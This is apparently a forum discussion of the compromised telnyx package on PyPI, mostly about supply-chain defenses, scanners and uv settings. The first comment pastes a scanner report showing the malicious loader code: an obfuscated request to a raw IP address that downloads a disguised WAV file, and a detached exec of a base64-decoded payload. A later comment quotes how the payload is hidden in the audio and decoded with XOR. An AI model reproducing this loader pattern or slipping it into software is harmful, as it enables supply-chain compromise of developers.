Discussion

Popular telnyx package compromised on PyPI by TeamPCP

f311a: They did not even try to hide the payload that much: hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000 warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request. ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77 86:13 │ 7783 │ except: 7784 │ pass 7785 │ 7786 │ r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')}) │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000 7787 │ with urllib.request.urlopen(r, timeout=15) as d: 7788 │ with open(t, "wb") as f: 7789 │ f.write(d.read()) │ = Confidence: High Help: Data exfiltration is the unauthorized transfer of data from a computer. warning[HX4010]: Execution of obfuscated code. ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78 10:9 │ 7807 │ if os.name == 'nt': 7808 │ return 7809 │ try: 7810 │ ╭ subprocess.Popen( 7811 │ │ [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"], 7812 │ │ stdout=subprocess.DEVNULL, 7813 │ │ stderr=subprocess.DEVNULL, 7814 │ │ start_new_session=True 7815 │ │ ) │ ╰─────────^ HX4010 7816 │ except: 7817 │ pass 7818 │ │ = Confidence: VeryHigh Help: Obfuscated code exec can be used to bypass detection.

slowmovintarget: Telnyx provides voice capabilities for OpenClaw for those wondering.

carlsborg: Anthropic/OpenAI could own this space. They should offer a paid service that offers a mirror with LLM scanned and sandbox-evaluated package with their next gen models. Free for individuals, orgs can subscribe to it.

oblvious-earth: OpenAI just acquired Astral who have an index service called pyx, so they would have a step up.My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.

oncallthrow: I think it's only a matter of time at this point before a devastating supply chain attack occurs.Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.

charcircuit: 2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.

jbrowning: > The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file.> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.Talk about burying the lede.

m000: Are there more tools like hexora?

dlcarrier: At this point, I'm not updating anything using Python.Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.

akx: Sounds like you're not familiar with https://docs.astral.sh/uv/ ...

jlundberg: We have always been API first rather than SDK first.Never really thought too much about the security implications but that is of course a benefit too.Main reasoning for us has been to aim for a really nice HTTP API rather than hide uglyness with an SDK on top.

johndough: Judging by curl shutting down its bug bounty program due to AI slop, a likely outcome would be that this mirror has no packages because they are all blocked by false positives.

f311a: GuardDog, but it's based on regexes

mil22: For those using uv, you can at least partially protect yourself against such attacks by adding this to your pyproject.toml: [tool.uv] exclude-newer = "7 days" or this to your ~/.config/uv/uv.toml: exclude-newer = "7 days" This will prevent uv picking up any package version released within the last 7 days, hopefully allowing enough time for the community to detect any malware and yank the package version before you install it.

firesteelrain: Own what space ?

indigodaddy: They should add voip.ms. it's better all around I think

TZubiri: Nice feature. However uv is suspect at the moment, in the sense that it is designed as a pip replacement to overcome issues that only exist when supply chains are of a size that isn't safe to have.So any project that has UV and any developer that tries to get uv into a project is on average less safe than a project that just uses pip and a requirements.txt

sdoering: Sorry - call me uninformed. But I do not really understand how choosing uv makes me less safe than using pip.Care to explain? Would love to learn.

infinitewars: Is this happening in part due to the sheer volume of pull-requests with AI generated code.. things are slipping through?

indigodaddy: Hah, need to setup a Grandstream HT801 this weekend and this cements my decision to use voip.ms vs telnyx. Not that the device would use that library (have no idea), but just, yeah generally, it's a good cue to stay away for me.

Imustaskforhelp: I really am not able to follow this line of reasoning, I am not sure if what you said makes sense and how it relates to uv having a security feature to be on average less safe :/

LoganDark: I used to use Telnyx many years ago, but was squeezed out when they started adding layer after layer of mandatory ID verification. Nope.

TZubiri: Agree. I was working on an open source package, noticed something weird, and noticed the size of the uv.lock and got a bit scared.It's a pandemic, I will be hardening my security, and rotating my keys just in case.

sigseg1v: but then how can we deploy our vibe coded PRs we didn't review at a pace of 40 deploys per day?

woodruffw: In a lot of cases, it's not really clear whose second factor would authorize publishing a package that was uploaded from a CI/CD system. Is it any project owner? Anyone from the same GitHub organization? etc.> An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.Agreed, that's why a lot of packaging ecosystems (including PyPI) have moved towards schemes that involve self-scoping, self-expiring tokens. The CI can still publish, but the attacker can no longer exfiltrate the publishing credential and use it indefinitely later.(These schemes are not mandatory, because they can't be.)

tomhow: Comments moved to https://news.ycombinator.com/item?id=47540388.